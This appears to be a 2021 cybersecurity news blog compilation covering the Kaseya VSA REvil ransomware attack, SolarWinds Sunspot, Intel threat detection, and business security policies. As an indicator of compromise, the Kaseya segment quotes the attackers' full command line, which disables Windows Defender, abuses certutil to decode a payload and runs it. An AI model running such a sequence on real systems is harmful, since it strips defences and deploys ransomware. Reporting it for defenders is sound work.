Updated 7/2/2021 - 17:51 ET

 

Shortly after 2PM on Friday July 2, 2021 administrators of the Kaseya VSA (Remote Monitoring and Management) Software as a Service began to experience issues where users were locked out and customer agents were receiving scripts to deploy ransomware.  By 3PM Kaseya had shut down and placed all cloud servers in maintenance mode and has put out communication for all self-hosted VSA partners to shut down their servers.

At least 8 Technology Service Providers have confirmed that thousands of their customers has now been encrypted by a REvil ransomware as a service affiliate.  Over the next 24-48 hours both the number of service providers and the end customers affected by this is expected to grow.

If you are a Kaseya VSA provider some signs of the attack are:

  • Ransomware encryptor is dropped toc:\kworking\agent.exe
  • The VSA procedure is named "Kaseya VSA Agent Hot-fix”
  • At least two tasks run the following:"C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe 

 

What about Multi-Factor Authentication (MFA)?

A number of the service providers impacted by this have also acknowledged that multi-factor authentication was utilized for all accounts and the security breach was still able to occur.  This points to a supply-chain style zero-day vulnerability within the Kaseya VSA platform.  This is an important fact as MFA has become a security baseline at preventing attacks and securing environments.

 

What is happening?

Once a service provider's Remote Monitoring and Management toolset is corrupted, users have reported that all users to the Kaseya VSA platform are locked out and then agent will drop a certificate file, named agent.crt, to the c:\kworking folder, which is used for updates to VSA.  A Powershell command is then launched to decode the agent.crt file using the legitimate Microsoft Windows certutil.exe and extra an agent.exe file to the same folder.

The new agent.exe is signed using a certificate from PB03 Transport LTD and includes an embedded MsMpEng.exe and MPSvc.dll, and the .dll file is the REvil data encryptor file, while the MsMPEng.exe is used to launch the DLL and encrypt the drive.

 

The Demand!

A sample of the REvil ransomware used in one of these attacks has been shared online, but it is not certain the same demand will apply to all victims.  For the sample posted online the ransomware gang is demanding a $5 Million ransom to receive the decryption key.  You can view the configuration file dump here.

 

What's Next?

At the speed that files were encrypted after user accounts to Kaseya VSA could lead to promise that files may not have been exported before encryption, however ransomware has trended more and more to the export then encrypt method so if your data is encrypted I would assume your data may have been breached and you should review your breach notification plans.

The service providers that were impacted will work tirelessly to restore both their own and their client systems likely working all hands on deck all weekend long, Kaseya will perform similar as getting the platform back online and patching the security flaws are the top two priorities to maintaining their customer base.

While the attack has only started roughly 4 hours ago now, it will be days or weeks until the full scope is understood.

 

We also continue our series today on improving your organizations cyber security documentation.  We have looked at Vendor Security Questionnaires and the Acceptable Use Policy, today we are going to start the process of data classification.

A Data Classification Policy is in place to detail why data classification should be done, and to establish a framework for classifying data based on its sensitivity, value, and criticality to the organization.

You want to break out roles and responsibilities, typically with a Data Owner, Data custodians, and Data users.  The owner is typically the department head or business owner that is responsible for the security of the data, whereas data custodians are typically your IT department or vendor.  Data users would then be all of the users that can or do access the data.

So I would start with your network share drives, and identify an overall impact level and classification label.  Typically, your impact level will be a high, moderate, or low.  The classification label should be something like restricted, confidential, public.  You create this so you can have more impact levels or classifications, but it has to make sense to you and your data custodians.

Next you want to build a guideline on what makes data fit into the impact and classification labels.  Again the goal is for the data owners to classify the data, so your guidelines here ensure that the data gets labeled correctly.

The guidelines should also cover and ensure that data that contains authentication information, Electronic Protected Health Information (ePHI), Payment card information (PCI), or other Personally Identifiable information (pii) is labeled as restricted and high impact. 

You can find a sample data classification policy as well as other policies we’ve covered at TheMorningBreach.Com under Resources, template downloads.

This is a great policy to get started on today, as a champion of Data Privacy Day through the National Cyber Security Alliance, we are trying to help you “Respect Privacy” by ensuring your cyber security policies are up to date and designed for the current state of the world.

 

Intel has added ransomware detection capabilities at the silicon level in it’s 11th generation Intel Core vPro CPUs with support for the Hardware Shield and Threat Detection Technology or TDT features.  Through a partnership with Boston based Cyberreason, these new features are expected in the first half of 2021.

Hardware Shield is a technology that will lock down the UEFI/BIOS, whereas TDT will utilize the CPU telemetry and ML heuristics to detect possibly malicious code.  The idea behind the new features is to share some of its data with security software and allow it to spot malware that may be hiding in places where antivirus apps can’t reach.  As the Intel PMU sits beneath applications, the OS, and virtualization layers on the system it can deliver a more accurate representation of active threats, system-wide. 

So if you’re looking at replacing computers, you may want to wait for the new 11th generation Intel chips.

A third malware strain has been discovered in the SolarWinds Supply Chain Attack has been identified by CrowdStrike, and it sheds some light on how hackers compromised the SolarWinds Orion app build process. 

Named Sunspot, this finding adds to the previously discovered Sunburst and Teardrop malware strains.  While Sunspot is the latest discovery, there is evidence that it was the first one used, actually going back to September 2019, when cyber criminals first breached SolarWinds internal network. 

Sunspot was placed on a build server, and its purpose was to simply watch the build server for build commands that assembled Orion.  Once a build command was detected, the malware would silently replace source code files inside the Orion app with files that loaded the Sunburst malware, resulting in Orion app versions that also installed the Sunburst malware. 

The trojanized Orion clients eventually made their way to one of SolarWinds official update servers and were installed globally.  Sunburst would activate inside the internal networks of businesses and governments and would collect data on its victims and send the information back to the cyber criminals via a DNS request.  If the threat actors decided a victim was important enough to compromise, the more powerful Teardrop backdoor trojan would be deployed or instruct the Sunburst malware to delete itself from networks deemed insignificant or high risk.

We begin today with a look at the recent Parler shut down and what it means to you as a business owner. Politics aside, the recent actions of multiple private technology providers to decide to no longer do business with a company should have you evaluating your technology stack as well.  For the vast majority of us, we will never be in the same boat as Parler found themselves in, but precedent has been set and now it should be included in your business continuity plans. 

It could be your social media business marketing presence or it could be your platform as a whole, but section 230 of the U.S. code was developed to promote the continued development of the internet actually protects providers and users from any action voluntarily taken in good faith to restrict access to or availability of material that the provider or user considers to be obscene, lewd, lascivious, filthy, excessively, violent, harassing, or otherwise objectionable, whether or not such material is constitutionally protected. 

So Section 230 actually protects and allows any provider to take action to restrict access or access to posts.  The slippery slope is the definition of what is considered to be in violation is ever changing and is open ended, so pending the audience your content today may be appropriate, but tomorrow it may not. 

At the end of the day, the data center hosts like Amazon AWS, the app store owners like Apple or Google, or even the company hosting your website are defined as private businesses and depending on your contracted terms ask you to remove your data.

This is where it’s important to understand the contract, depending on what you are hosting online knowing and understanding the terms of cancelation of service and how long you would have to locate a new provider and move your data.

So inside your business continuity plans, you should add a section and include the contracted information with your web service providers, and what the ramifications would be if a service went offline.

It also appears that right before the site was taken offline the site, roughly 70 TB of data including messages, videos, group members and administrative accounts, posts, and even deleted posts were leaked.  This data might prove valuable to law enforcement since many who participated in the recent protests at the U.S. capitol building used the social platform.

Laptops and other portable devices (such as phones, tablets, usb drives, and other devices) are frequently stolen or lost.  Within your acceptable use policy, employees should be required to report immediately when one of these devices goes missing, so every company at some point is going to need to deal with a missing device.

It is being reported that during the breach of the United States Capitol building, that a laptop belonging to House Speaker Nancy Pelosi was stolen.  Which hopefully is secured with some of the below proactive security steps to limit the risk of a more severe data breach.

The actions taken before a device goes missing is crucial in identifying what steps will have to be taken when a device goes missing.

The first thing that needs completed is the understanding of who the user is going to be and what types of data may be found on the device.  Every effort should be made to limit data on the laptop itself but for some users having that data locally in going to be required for their job.  When data has to leave the confines of the server infrastructure, it has to be classified and documented within your data management policy so that if or when that device is stolen you know what data is at risk of breach.

That step should be mandatory, but there are proactive steps that can be taken to limit the damage and risk to the data and your business.

First ensuring that the password is not on a sticker on the device is a great step one but enabling a multi-factor authentication process is a more secure method that should be utilized whenever dealing with data of high or critical classifications, like PII or client data. 

Even without a password, data on mobile devices are at risk of breach.  It should be mandatory to require drive encryption using at minimum the built in BitLocker or Apple FileVault.

At this point if a device is lost or stolen you can validate with a degree of certainty that the data is safe.

Now it’s likely one or more of the proactive measures was not incorporated and you’ve experienced a loss of a device.  Remember that reports of missing or lost devices should funnel to your IT Department or vendor.

Here you have to start at the beginning and understand what data was on the device and what if any proactive measures were in place to protect that data.  If you can’t validate with certainty then you should assume the data was breached, or even worse if you don’t know what data was stored locally on the device then you should assume everything that was accessible by the user was stored locally, including e-mails. 

Depending on your local, federal laws, compliance requirements, and the type of data it may trigger a breach notification, which is why it’s better to know then have to assume the worst.   The chances of recovering the device varies pending the type of device but you should assume that it will not be recovered.

You’ve now identified the damage and have started the process of the breach notification, now it’s time to secure the compromised user.

Using Microsoft 365 or your e-mail provider, you should be able to lock out and potentially wipe remote data that was stored on the laptop.  You can also ban the MAC address from the firewall and wireless networks depending on the network infrastructure used and the risk determined.

Passwords should be changed, and the passwords that may have been stored in web browsers should be assumed compromised, and those passwords should be added to banned lists if established.

You will also want to go through the systems and services the device was connected to and remove active licenses when applicable pending the case.

Finally, an incident report should be filed, and documentation should be reviewed and updated with changes to the processes followed.

At the end of the day, it is your responsibility of the business owners to protect their technology assets and data, if you’re that business owner or a person hired to protect those resources, you must ensure the policies are built are protect you.

If you have questions, ask your IT department or vendor.  If you’re still not sure reach out to other local vendors or post a message in the comments.

Continuing on our journey to improve your business documentation we are going to target the Acceptable Use Policy or AUP, which every business should have and it should be part of the hiring process and reviewed annually by all of your employees. 

The purpose of an AUP is to outline the acceptable use of technology including data for your employees.  That could be social media postings, what you use your work laptop for, mobile devices, electronic communication, and more. 

Your AUP needs to identify the general use and ownership of equipment and data, especially as the remote workforce is not going away anytime soon.  It needs to outline that the employee is responsible for the protection of any data on their systems or which they have access.  This includes making sure the computer is locked when they are away and not allowing their kids to use the work laptop for schoolwork.

It also needs to outline that you reserve the right to scan computers, network devices, web traffic, e-mail, communication traffic, and other resources to ensure they are being used as outlined in the AUP.

Next you dig into security typically outlining password security requirements and other business practices that are followed like Zero-Trust.

The most important section is the compliance section, and what the penalty is for non-compliance. 

If you don’t already have an AUP at your business you can locate a free sample at TheMorningBreach.com to help you get started.

I have been asked if the cyber security industry needs more advanced solutions to combat to challenges faced today, and I don’t think we do.  Most of the successes from cyber criminals are achieved using methods that have been around for years.  From not patching a system, using default or easy to guess credentials, or falling for social engineering and giving up your credentials.  There is an amazing suite of tools and services that are well positioned to accept the challenge and give you peace of mind, while knowing that there is never going to be a 100% solution.

The biggest challenge I see is with cyber security inexperience, or a small IT shop that promotes its cyber security model, but in reality all of their time is spent putting out fires on reactive responses.  There is no single test, or single association that can proclaim they know it better than the next, and it places business owners in a tough spot on finding the right solution and partner to protect their data.

The best thing for you to do as a business owner is to do annual checks and balances on your partners or even the internal staff, and you achieve this with a third-party security audit.  In today’s world of cyber security, it’s not a threat of you’re not doing your job.  It’s a let’s have someone that knows nothing about what you’re doing try to get in and see what they find.  That fresh set of eyes will likely uncover something every time. 

Not only by adding this to your plan in 2021 will you better protect yourself, but you align yourself more with industry standards, compliance requirements, and will likely be able to provide that report for a savings on cyber security insurance which after 2020 is sure to rise.

The word breach indicates that a safeguard has failed and resources that were behind that safeguard are now at risk.  Often that threat is virtually, but it can be physical as well.

Currently in the United States, protestors have stormed the United States Capitol and have gained illegal access to offices used by house and senate members.  Once the building, or safeguard, was breached the elected officials and staffers were moved to secure areas as they should be.

At this point there is also a threat to the technology infrastructure and data.  Now, it could be a random device plugged into an open network jack, or damage to physical technology equipment, or even a breach of the data itself.  You would expect measures are in place that would automatically enable screen savers and any systems would be encrypted to limit the risk of access to these machines.

What if that is not the case?  A photo posted to social media claiming to be inside Nancy Pelosi’s, the Speaker of the House, office with revolutionaries showing a photo of an unlocked Windows 10 computer.

Now your business likely doesn’t contain data similar to that which may be on this specific computer, but what data is on it and how would losing that data or reporting a breach of that data affect your business.

It should be assumed that a data breach has occurred here because the potential of access to confidential files can be validated through the alleged photo.

We should use this as an example to document a plan of action and review the security of your current systems.  Which should begin with what is the current screen saver and password requirement policy.

Next you have to assume a data breach occurred so a complete forensic review of systems and network infrastructure has to be completed to validate the data and systems are secure.  Every user should be required to change their passwords, and access to technology assets should be blocked until each system is validated. 

A review of mailbox rules and analysis of all data leaving the network needs to be blocked and examined to ensure all data leaving is legitimate.

Cyber Attacks and Data Breaches happen multiple ways, when a situation arises that is not normal, it should call us all to use this situation as a learning opportunity and improve our own security.

 

 

© 2021 The Morning Breach, All Rights Reserved. Produced and Created by Scott R Davis